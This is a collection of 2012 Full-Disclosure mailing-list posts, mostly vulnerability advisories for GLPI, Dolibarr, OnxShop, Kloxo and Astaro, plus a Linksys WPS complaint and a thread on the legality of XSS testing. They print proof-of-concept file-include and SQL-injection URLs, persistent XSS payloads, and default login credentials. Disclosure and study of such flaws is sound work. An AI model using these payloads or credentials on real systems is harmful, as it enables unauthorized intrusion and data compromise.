[Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
Don't buy Linksys Routers they are vulnerable to Wifi unProtected Setup Pin registrar Brute force attack. No patch or workaround exist at the making of this post. Vulnerable list and alleged patch availability: source:http://www6.nohold.net/Cisco2/ukp.aspx?vw=1articleid=25154 E1000 To Be Disclosed (aka we don't have idea) E1000 v2 To Be Disclosed E1000 v2.1 To Be Disclosed E1200 v1 early March E1200 v2 early March E1500 early March E1550 mid March E2000 To Be Disclosed E2100L mid March E2500 early March E3000 To Be Disclosed E3200 early March E4200 v1 early March E4200 v2 To Be Disclosed M10 To Be Disclosed M20 To Be Disclosed M20 v2 To Be Disclosed RE1000 early March WAG120N To Be Disclosed WAG160N To Be Disclosed WAG160N v2 To Be Disclosed WAG310G To Be Disclosed WAG320N To Be Disclosed WAG54G2 To Be Disclosed WAP610N To Be Disclosed WRT110 To Be Disclosed WRT120N To Be Disclosed WRT160N v1 To Be Disclosed WRT160N v2 To Be Disclosed WRT160N v3 To Be Disclosed WRT160NL To Be Disclosed WRT310N v1 To Be Disclosed WRT310N v2 To Be Disclosed WRT320N To Be Disclosed WRT400N To Be Disclosed WRT54G2 v1 To Be Disclosed WRT54G2 v1.3 To Be Disclosed WRT54G2 v1.5 To Be Disclosed WRT54GS2 v1 To Be Disclosed WRT610N v1 To Be Disclosed WRT610N v2 To Be Disclosed X2000 To Be Disclosed X2000 v2 To Be Disclosed X3000 To Be Disclosed The question is why a big company like Cisco/Linksys didn't release a patch since almost 1 month and a half ?. Well i have circumstantial evidence that Cisco outsource some of their Linksys firmware routers to other companies (Arcadyan for example.) in some cases source code is only available through NDA's or not available at all. That's why they are taking so long to release a fix to the WPS vulnerability. Fixing a vulnerability like this with all the bureoucratic, QA and legal process wouldn't take no more than 2 weeks. I found some GPL violations by the way but this is beyond the scope of this message (obfuscating firmware it's useless you now). I apologize if i offended someone but IT security it's serious business specially if someone use your wifi to commit crimes. This vulnerability contains public and very easy to use exploit code, it's not a Denial of Service. Farth Vader.___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Celebrate with PenTest Magazine
Celebrate with PenTest Magazine To celebrate the transformation of PenTest StarterKit edition into Auditing Standards PenTest, we've decided to give everyone access to 4 full PenTest issues for free All you need to do to download them is create a free account. Sign up as a free member here: http://pentestmag.com/subscribe/ And after you activate your account, download all the issues here (click Full version download button): PenTest StarterKit (3 issues): http://pentestmag.com/pentest-starterkit-111/ http://pentestmag.com/pentest-starterkit-211-2/ http://pentestmag.com/pentest-starterkit-12012/ + Special Social-Engineer.com PenTest Issue: http://pentestmag.com/social-engineering-pentest-092012/ Enjoy the PenTest Fiesta! PenTest Team e...@pentestmag.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] posting xss notifications in sites vs software packages
Wellin Germany...our law regarding security in general is very, very vague. It basically says that you have to go to prison if you produce or publish any information and/or tools (for so-called hacking-purposes) in preparation for a criminal offense. And: if you get unauthorized access to data which is specially secured by evading the security mechanisms. But The European Expert Group for IT Security says that especially the first part does not apply if you're dealing with information and tools in a good-natured way using e.g. a detailed reporting or documentation. So i think it's hard to say if looking for a custom website vulnerability (and finally not using it for bad purposes) is illegal...at least it depends on how the judge defines criminal offense and interprets your behavior. @Valdis: Therefor: agree :) Regards Julien. On 02/09/2012 03:23 AM, valdis.kletni...@vt.edu wrote: On Wed, 08 Feb 2012 17:30:18 +0100, Info said: A general question: is it legal to search for XSS vulnerabilities on custom websites ? Yes. No. Maybe. Depends where you live, where the web server is physically located, and where the corporate headquarters are. In the US, the law you need to worry about most is 18 USC 1030: http://www.law.cornell.edu/uscode/html/uscode18/usc_sec_18_1030000-.html ... having knowingly accessed a computer without authorization or exceeding authorized access, and by means of such conduct having obtained information... It's going to come down to whether the jury believes the prosecutor's version or your version of what exceeding authorized access means - which is why professional pen testers make sure they get a Get Out Of Jail Free card, and negotiate rules of engagement (what's allowed, what's not) as part of the contract. You amature pen testers are on your own. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2012-1037: GLPI = 0.80.61 LFI/RFI
CVE-2012-1037: GLPI = 0.80.61 LFI/RFI
Severity: Important
Vendor: GLPI - http://www.glpi-project.org
Versions Affected
=
All versions between 0.78 and 0.80.61
Description
===
GLPI fails to properly sanitize the GET 'sub_type' parameter in the
front/popup.php file:
[...]
checkLoginUser();
if (isset($_GET[popup])) {
$_SESSION[glpipopup][name] = $_GET[popup];
}
if (isset($_SESSION[glpipopup][name])) {
switch ($_SESSION[glpipopup][name]) {
[...]
case add_ruleparameter :
popHeader($LANG['ldap'][35], $_SERVER['PHP_SELF']);
include strtolower($_GET['sub_type'].Parameter.php); // ===
break;
[...]
To be triggered, the attacker needs to be authenticated. However, GLPI provides
default accounts that often aren't changed or disabled:
glpi/glpi
tech/tech
normal/normal
post-only/postonly
Impact
==
Since there is a suffix, the vulnerability can be used as a RFI (requires
allow_url_include = On).
For LFI, the target file has to end up with parameter.php. GLPI automatically
escapes all GET and POST parameters with addslashes(), so the null byte
technique is not usable. I have not tested exploitation using path truncation
technique but it might be possible.
Mitigation
==
Upgrade to GLPI 0.80.7.
Exploit
===
http://server/front/popup.php?popup=add_ruleparametersub_type=file
Timeline
08 feb 2012 - Found the bug.
09 feb 2012 - Contacted the GLPI Team.
09 feb 2012 - Bug fixed new version available.
Thanks to the GLPI team for being responsive!
References
==
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1037
https://forge.indepnet.net/projects/glpi/versions/685
https://forge.indepnet.net/projects/glpi/repository/revisions/17457/diff/branches/0.80-bugfixes/front/popup.php
--
Emilien Girault
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Dolibarr CMS v3.2.0 Alpha - File Include Vulnerabilities
Title: == Dolibarr CMS v3.2.0 Alpha - File Include Vulnerabilities Date: = 2012-02-07 References: === http://www.vulnerability-lab.com/get_content.php?id=428 VL-ID: = 428 Introduction: = Dolibarr ERP CRM is a modern software to manage your company or foundation activity (contacts, suppliers, invoices, orders, stocks, agenda, ...). It s an opensource free software designed for small and medium companies, foundations and freelances. You can install, use and distribute it as a standalone application or as a web application (on mutualized or dedicated server, or on SaaS or Cloud solutions) and use it with any devices (desktop, smartphone, tablet). (Copy of the Vendor Homepage: http://www.dolibarr.org/) Abstract: = Vulnerability-Lab researcher discovered a multiple File Include Vulnerabilities on Dolibarrs CMS v3.2.0 Alpha. Report-Timeline: 2011-02-08: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: Multiple File Include Vulnerabilities are detected on Dolibarrs Content Management System v3.2.0 Alpha. The vulnerability allows an attacker (remote) or local low privileged user account to request local web-server or system files. Successful exploitation of the vulnerability results in dbms application compromise. Vulnerable Module(s): [+] ?modulepart=projectfile= [+] ?action=createactioncode=AC_RDVcontactid=1socid=1backtopage= Picture(s): ../1.png ../2.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For demonstration or reproduce ... http://xxx.com/document.php?modulepart=projectfile=../[FILE INCLUDE VULNERABILITY!] http://xxx.com/comm/action/fiche.php?action=createactioncode=AC_RDVcontactid=1socid=1backtopage=../common/[FILE INCLUDE VULNERABILITY!] Risk: = The security riks of the file include vulnerabilities are estimated as high(+). Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri Ucha Gobejishvili (longrifle0x) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OnxShop CMS v1.5.0 - Multiple Web Vulnerabilities
Title:
==
OnxShop CMS v1.5.0 - Multiple Web Vulnerabilities
Date:
=
2012-02-08
References:
===
http://www.vulnerability-lab.com/get_content.php?id=426
VL-ID:
=
426
Introduction:
=
Onxshop is not only great CMS offering integrated in-context editing and full
design freedom without the constraints
of limiting templates, but it s also stable ecommerce platform used in
production environment since 2006. Flexible layout
modules, which support nesting based on the Fibonacci sequence Complete
HTML/CSS framework, which allows you to use the
same HTML and core CSS for multiple websites with different branding and
designs.
Simplified MVC paradigm using Model = Storage Access (SQL and PHP), View =
Presentation to client (simple HTML engine),
Controller = Handling actions (request processing in PHP to produce View).
To put it simply, you will not see the $align option in Model or Controller or
the SQL query in Controller
Flexible routing system which allows each component to be called on its own
(useful for AJAX)
The option to rewrite each template, model or controller specifically for a
project, so developers can add their own
stamp to the system. Common components that are all built directly by our core
team, which means that 99% of projects
don\\\'t need to install external components. This
eliminates problems with incompatible components (extensions/modules/plugins)
which affects some CMS software. Behavioural targeting support in the core
system and many other components. An all in one system -
content management system, blog, product catalogue and checkout process all
rolled into one. This allows users share the same
category system and media library across their product catalogue and blog
articles, or include an “add to basket” button in
blog posts about a product. There isn t any other web system in the universe
which can do this with such ease.
One fulltext search for the CMS, eCommerce and blog.
Onxshop is a new kind of Content Management System (Shop|eCommerce). Onxshop is
currently used by more than 50
businesses around the world, and that figure is growing all the time.
(Copy of the Vendor Homepage: http://http://onxshop.com/)
Abstract:
=
Vulnerability-Lab Team discovered multiple web vulnerabilities on Onxshops
Content Management System v1.5.0
Report-Timeline:
2012-02-09: Public or Non-Public Disclosure
Status:
Published
Exploitation-Technique:
===
Remote
Severity:
=
Medium
Details:
Multiple persistant input validation vulnerabilities are detected on on
Onxshops Content Management System v1.5.0.
The bug allows remote attacker to implement malicious script code on the
application side (persistent).
Successful exploitation of the vulnerability allows an attacker to manipulate
modules/context (persistent) can
lead to session hijacking (user/mod/admin).
Vulnerable Module(s):
[+] Pages - Title
[+] Search - Keywords
Inputs
[+] Vochou
Pictures:
../1.png
../2.png
../3.png
Proof of Concept:
=
The vulnerabilities can be exploited by remote attackers with medium required
user inter action. For demonstration or reproduce ...
1.
tr id=node_id_1194
tda onclick=openEdit('/popup/properties/1194/orig/page/88')
href=javascript:void(1194)
class=#8203;#8203;#8203;#8203;#8203;iframe a= =
onload='alert(VulnerabilityLab)' src=a/td
tdpage/default/td
td0/td
td0/td
tddiv class=onxshop_page_propertiesa class=onxshop_delete
title=Delete default href=#1194spanDelete/span/a/div/td/tr
/tbody
/table
2.
div id=breadCrumb
a href=/reportsReports/a span style=font-size:8px;/spanspan
class=location
img src=http://www.vulnerability-lab.com/gfx/partners/vlab.png;
onLoad=alert(1337);/span [X]
/div
...or
option value=allAll Orders/option/select
/span
/divdiv class=row search
span class=labellabelSearch query/label/span
span class=field
#8203;#8203;#8203;#8203;#8203;input width=800 type=text height=800
src=http://vulnerability-lab.com; iframe=
value= name=order-list-filter[query] id=query/ //span/div
div class=row registered_between
span class=labellabelCreated between/label/span
span class=field
input width=800 type=text height=800 src=http://vulnerability-lab.com;
iframe= value= name=order-list-filter[created_from]
id=order-list-filter-created_from
class=text hasDatepicker/ /
input width=800 type=text height=800
src=http://vulnerability-lab.com; iframe= value=
name=order-list-filter[created_to] id=order-list-
filter-created_to class=text hasDatepicker/
[Full-disclosure] Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities
Title: == Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities Date: = 2012-02-09 References: === http://www.vulnerability-lab.com/get_content.php?id=427 VL-ID: = 427 Introduction: = Dolibarr ERP CRM is a modern software to manage your company or foundation activity (contacts, suppliers, invoices, orders, stocks, agenda, ...). It s an opensource free software designed for small and medium companies, foundations and freelances. You can install, use and distribute it as a standalone application or as a web application (on mutualized or dedicated server, or on SaaS or Cloud solutions) and use it with any devices (desktop, smartphone, tablet). (Copy of the Vendor Homepage: http://www.dolibarr.org/) Abstract: = Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability on Dolibarrs CMS v3.2.0 Alpha. Report-Timeline: 2011-02-09: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: Multiple remote SQL Injection vulnerabilities are detected on Dolibarrs Content Management System v3.2.0 Alpha. The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands on the affected application dbms. Successful exploitation of the vulnerability results in dbms application compromise. Vulnerable Module(s): [+] Member List [+] Row ID --- Error/Exception Logs --- Das System hat einen technischen Fehler festgestellt. Diese Informationen könnten bei der Diagnose des Fehlers behilflich sein: Datum: 20120209164847 Dolibarr: 3.2.0-alpha Funktions-Level: 0 PHP: 5.2.4-2ubuntu5.19 Server: Apache Angeforderte URL: /adherents/fiche.php?rowid=-1%27 Menüverwaltung: eldy_backoffice.php Datenbanktyp-Verwaltung: mysql Anfrage des letzten Datenbankzugriffs mit Fehler: SELECT d.rowid, d.civilite, d.prenom as firstname, d.nom as lastname, d.societe, d.fk_soc, d.statut, d.public, d.adresse as address, d.cp as zip, d.ville as town, d.note, d.email, d.phone, d.phone_perso, d.phone_mobile, d.login, d.pass, d.photo, d.fk_adherent_type, d.morphy, d.datec as datec, d.tms as datem, d.datefin as datefin, d.naiss as datenaiss, d.datevalid as datev, d.pays, d.fk_departement, p.rowid as country_id, p.code as country_code, p.libelle as country, dep.nom as state, dep.code_departement as state_code, t.libelle as type, t.cotisation as cotisation, u.rowid as user_id, u.login as user_login FROM llx_adherent_type as t, llx_adherent as d LEFT JOIN llx_c_pays as p ON d.pays = p.rowid LEFT JOIN llx_c_departements as dep ON d.fk_departement = dep.rowid LEFT JOIN llx_user as u ON d.rowid = u.fk_member WHERE d.fk_adherent_type = t.rowid AND d.entity = 1 AND d.rowid=-1\\\' Return-Code des letzten Datenbankzugriffs mit Fehler: DB_ERROR_SYNTAX Inhalt des letzten Datenbankzugriffs mit Fehler: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \\\'\\\'\\\' at line 1 Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \\\'\\\'\\\' at line 1 Picture(s): ../1.png ../2.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For demonstration or reproduce ... 1.1 1. Login to the Panel 2. Open the list.php 3. Include the following example string - on the memberslist -%20` 1.2 http://demo.dolibarr.org/adherents/fiche.php?rowid=-1%27[SQL Injection Vulnerability!] Risk: = The security risk of the sql injection vulnerabilities are stimated as high(+). Credits: Vulnerability Research Laboratory -Benjamin Kunz MejriUcha Gobejishvili Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form
[Full-disclosure] Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities
Title: == Dolibarr CMS v3.2.0 Alpha - SQL Injection Vulnerabilities Date: = 2012-02-09 References: === http://www.vulnerability-lab.com/get_content.php?id=427 VL-ID: = 427 Introduction: = Dolibarr ERP CRM is a modern software to manage your company or foundation activity (contacts, suppliers, invoices, orders, stocks, agenda, ...). It s an opensource free software designed for small and medium companies, foundations and freelances. You can install, use and distribute it as a standalone application or as a web application (on mutualized or dedicated server, or on SaaS or Cloud solutions) and use it with any devices (desktop, smartphone, tablet). (Copy of the Vendor Homepage: http://www.dolibarr.org/) Abstract: = Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability on Dolibarrs CMS v3.2.0 Alpha. Report-Timeline: 2011-02-09: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: Multiple remote SQL Injection vulnerabilities are detected on Dolibarrs Content Management System v3.2.0 Alpha. The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands on the affected application dbms. Successful exploitation of the vulnerability results in dbms application compromise. Vulnerable Module(s): [+] Member List [+] Row ID --- Error/Exception Logs --- Das System hat einen technischen Fehler festgestellt. Diese Informationen könnten bei der Diagnose des Fehlers behilflich sein: Datum: 20120209164847 Dolibarr: 3.2.0-alpha Funktions-Level: 0 PHP: 5.2.4-2ubuntu5.19 Server: Apache Angeforderte URL: /adherents/fiche.php?rowid=-1%27 Menüverwaltung: eldy_backoffice.php Datenbanktyp-Verwaltung: mysql Anfrage des letzten Datenbankzugriffs mit Fehler: SELECT d.rowid, d.civilite, d.prenom as firstname, d.nom as lastname, d.societe, d.fk_soc, d.statut, d.public, d.adresse as address, d.cp as zip, d.ville as town, d.note, d.email, d.phone, d.phone_perso, d.phone_mobile, d.login, d.pass, d.photo, d.fk_adherent_type, d.morphy, d.datec as datec, d.tms as datem, d.datefin as datefin, d.naiss as datenaiss, d.datevalid as datev, d.pays, d.fk_departement, p.rowid as country_id, p.code as country_code, p.libelle as country, dep.nom as state, dep.code_departement as state_code, t.libelle as type, t.cotisation as cotisation, u.rowid as user_id, u.login as user_login FROM llx_adherent_type as t, llx_adherent as d LEFT JOIN llx_c_pays as p ON d.pays = p.rowid LEFT JOIN llx_c_departements as dep ON d.fk_departement = dep.rowid LEFT JOIN llx_user as u ON d.rowid = u.fk_member WHERE d.fk_adherent_type = t.rowid AND d.entity = 1 AND d.rowid=-1\\\' Return-Code des letzten Datenbankzugriffs mit Fehler: DB_ERROR_SYNTAX Inhalt des letzten Datenbankzugriffs mit Fehler: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \\\'\\\'\\\' at line 1 Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \\\'\\\'\\\' at line 1 Picture(s): ../1.png ../2.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For demonstration or reproduce ... 1.1 1. Login to the Panel 2. Open the list.php 3. Include the following example string - on the memberslist -%20` 1.2 http://demo.dolibarr.org/adherents/fiche.php?rowid=-1%27[SQL Injection Vulnerability!] Risk: = The security risk of the sql injection vulnerabilities are stimated as high(+). Credits: Vulnerability Research Laboratory -Benjamin Kunz MejriUcha Gobejishvili Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form
[Full-disclosure] Indianapolis Superbowl 2012 - SQL Injection Vulnerabilities
Title: == Indianapolis Superbowl 2012 - SQL Injection Vulnerabilities Date: = 2012-02-06 VL-ID: = 418 Abstract: = Alexander Fuchs discovered 2 remote SQL Injection Vulnerabilities on the official website of Indianapolis Superbowl 2012 (US). Status: Verified by Laboratory Severity: = High Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Astaro Security Gateway - bypass using whitelist domain pattern weakness
*Advisory Information* Title: Astaro Security Gateway - bypass using whitelist domain pattern weakness upSploit Ref: UPS-2011-0041 *Advisory Summary* Astaro Security Gateway's default Web Filtering Exceptions allow specially-named domains to bypass security features of the firewall. *Vendor* Astaro *Affected Software* Astaro Security Gateway Astaro Security Gateway hardware, software, and virtual appliances provide full Unified Threat Management protection. All platforms include the complete feature set and the same ease-of-use. - http://www.astaro.com/ *Description of Issue* Astaro Security Gateway - Home edition was used, other versions may be affected. In the ASG WebAdmin console, choose Web Security, Web Filtering, Exceptions. The following regular expressions form a default whitelist that allow bypassing of the firewall's features at varying levels to achieve compatibility (one would assume): ^https?://[A-Za-z0-9.-]*adobe.com/ ^https?://[A-Za-z0-9.-]*apple.com/ ^https?://[A-Za-z0-9.-]*windowsupdate.com/ ^https?://[A-Za-z0-9.-]*microsoft.com/ However, a savvy attacker need only serve malware from a drive-by web site named www.exampleadobe.com (which would match the first regular expression above) and the features of the firewall that would be bypassed include: Antivirus / Extension blocking / Content Removal / Authentication / URL Filter. The regular expressions need to be fixed to ensure the domain cannot be prefixed with other letters. *PoC* Use of a domain name such as www.exampleadobe.com to serve up EICAR virus (untested). *Fix* Update to the latest version *Credits* Timeless Prototype *References* http://www.astaro.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Indianapolis Superbowl 2012 - SQL Injection Vulnerabilities
http://www.indianapolissuperbowl.com/view-release.php?id=42 2012/2/10 resea...@vulnerability-lab.com resea...@vulnerability-lab.com Title: == Indianapolis Superbowl 2012 - SQL Injection Vulnerabilities Date: = 2012-02-06 VL-ID: = 418 Abstract: = Alexander Fuchs discovered 2 remote SQL Injection Vulnerabilities on the official website of Indianapolis Superbowl 2012 (US). Status: Verified by Laboratory Severity: = High Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
Use Tomato-USB OS on them. A. On Fri, 10 Feb 2012 07:40:03 +, farthva...@hush.ai wrote: Don't buy Linksys Routers they are vulnerable to Wifi unProtected Setup Pin registrar Brute force attack. No patch or workaround exist at the making of this post. Vulnerable list and alleged patch availability: source:http://www6.nohold.net/Cisco2/ukp.aspx?vw=1articleid=25154 [1] E1000 To Be Disclosed (aka we don't have idea) E1000 v2 To Be Disclosed E1000 v2.1 To Be Disclosed E1200 v1 early March E1200 v2 early March E1500 early March E1550 mid March E2000 To Be Disclosed E2100L mid March E2500 early March E3000 To Be Disclosed E3200 early March E4200 v1 early March E4200 v2 To Be Disclosed M10 To Be Disclosed M20 To Be Disclosed M20 v2 To Be Disclosed RE1000 early March WAG120N To Be Disclosed WAG160N To Be Disclosed WAG160N v2 To Be Disclosed WAG310G To Be Disclosed WAG320N To Be Disclosed WAG54G2 To Be Disclosed WAP610N To Be Disclosed WRT110 To Be Disclosed WRT120N To Be Disclosed WRT160N v1 To Be Disclosed WRT160N v2 To Be Disclosed WRT160N v3 To Be Disclosed WRT160NL To Be Disclosed WRT310N v1 To Be Disclosed WRT310N v2 To Be Disclosed WRT320N To Be Disclosed WRT400N To Be Disclosed WRT54G2 v1 To Be Disclosed WRT54G2 v1.3 To Be Disclosed WRT54G2 v1.5 To Be Disclosed WRT54GS2 v1 To Be Disclosed WRT610N v1 To Be Disclosed WRT610N v2 To Be Disclosed X2000 To Be Disclosed X2000 v2 To Be Disclosed X3000 To Be Disclosed The question is why a big company like Cisco/Linksys didn't release a patch since almost 1 month and a half ?. Well i have circumstantial evidence that Cisco outsource some of their Linksys firmware routers to other companies (Arcadyan for example.) in some cases source code is only available through NDA's or not available at all. That's why they are taking so long to release a fix to the WPS vulnerability. Fixing a vulnerability like this with all the bureoucratic, QA and legal process wouldn't take no more than 2 weeks. I found some GPL violations by the way but this is beyond the scope of this message (obfuscating firmware it's useless you now). I apologize if i offended someone but IT security it's serious business specially if someone use your wifi to commit crimes. This vulnerability contains public and very easy to use exploit code, it's not a Denial of Service. Farth Vader. Links: -- [1] http://www6.nohold.net/Cisco2/ukp.aspx?vw=1articleid=25154 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Linux Kloxo LxCenter Server CP v6.1.10 - Multiple Web Vulnerabilities
Title:
==
Kloxo LxCenter Server CP v6.1.10 - Multiple Web Vulnerabilities
Date:
=
2012-02-10
References:
===
http://www.vulnerability-lab.com/get_content.php?id=429
VL-ID:
=
429
Introduction:
=
Scriptable, distributed and object oriented Hosting Platform. Manage
Clients, Resellers,
Domains, Backups, Stats, Mails and Databases. Manage everything!
(Copy of the Vendor Homepage: http://www.lxcenter.org/)
Abstract:
=
Vulnerability-Lab Team discovered multiple web vulnerabilities on
Kloxos LxCenter Server CP v6.1.10.
Report-Timeline:
2012-02-10:Public or Non-Public Disclosure
Status:
Unpublished
Exploitation-Technique:
===
Remote
Severity:
=
Medium
Details:
Multiple persistant input validation vulnerabilities are detected on
Kloxos LxCenter Server CP v6.1.10.
The bug allows remote attacker to implement malicious script code on the
application side (persistent).
Successful exploitation of the vulnerability allows an attacker to
manipulate modules/context (persistent) can
lead to session hijacking (user/mod/admin).
Vulnerable Module(s):
[+] LocalHost {Command Center}
[+] Server Information Verbose Settings
Picture(s):
../1.png
../2.png
Proof of Concept:
=
The vulnerabilities can be exploited by remote attackers with medium
required user inter action. For demonstration or reproduce ...
1.1
Localhost {Command Center}
script global_need_list = new Array(); /scriptscript
global_match_list = new Array(); /scriptscript
global_desc_list = new Array(); /scriptform onsubmit=``return
check_for_needed_variables(`command_centerlocalhost`);``
method=``post`` enctype=``multipart/form-data`` action=``/display.php``
id=``command_centerlocalhost`` name=``command_centerlocalhost``
fieldset style=``background-color: rgb(255, 255, 255); border: 0px
none; padding: 10px;`` width=``90%``legend style=``
font-weight: normal; border: 0px none;``font color=``#303030``
style=``font-weight: bold;``Command Center for localhost
/font /legend/fieldset div align=``left``
style=``background-color: rgb(255, 255, 255); width: 90%;``div align=``
left`` style=``width: 500px; border: 1px solid rgb(177, 192,
240);``input type=``hidden`` value=``pserver``
name=``frm_o_o[0][class]``/
input type=``hidden`` value=``localhost`` name=``frm_o_o[0][nname]``/
div align=``left`` style=``padding: 10px; background-color: rgb(250,
248, 248); display: block;`` Command br/
... or
input width=``60%`` type=``text`` value=``
name=``frm_pserver_c_ccenter_command``
class=``frm_pserver_c_ccenter_command textbox``/
iframe size=``30`` ``=`` [PERSISTENT SCRIPT CODE INJECT!]` src=``a``
/div div align=left style=`padding:10 10 10 10 ;border-top
:1px solid #aa; background-color:#ff;display:block` Output
br textarea nowrap id=textarea_ class=
frmtextarea rows=10 style=`margin:0 0 0 50;width:85%;height:200px;`
name=`` size=30 /textarea
script
type=``text/javascript``createTextAreaWithLines(`textarea_`);/script
style
1.2
Server = Information = 2 x Verbose Input
font color=``#303030`` style=``font-weight: bold;``Information for
localhost /font /legend/fieldset
div align=``left`` style=``background-color: rgb(255, 255, 255); width:
90%;``div align=``left`` style=``width: 500px; border: 1px
solid rgb(177, 192, 240);``input type=``hidden`` value=``pserver``
name=``frm_o_o[0][class]``/
input type=``hidden`` value=``localhost``
name=``frm_o_o[0][nname]``/
script global_need_list[`frm_pserver_c_description`] = `Verbose
Description (to Identify)`; /script
div align=``left`` style=``padding: 10px; background-color: rgb(250,
248, 248); display: block;`` Verbose Description (to Identify)
font color=``red``sup*/sup/font br/
input width=``60%`` type=``text`` [PERSISTENT SCRIPT CODE INJECT!]``
iframe=`` value=``
`` name=``frm_pserver_c_description`` class=``frm_pserver_c_description
textbox``/`` size=``30`` /div div align=``left`` style=``
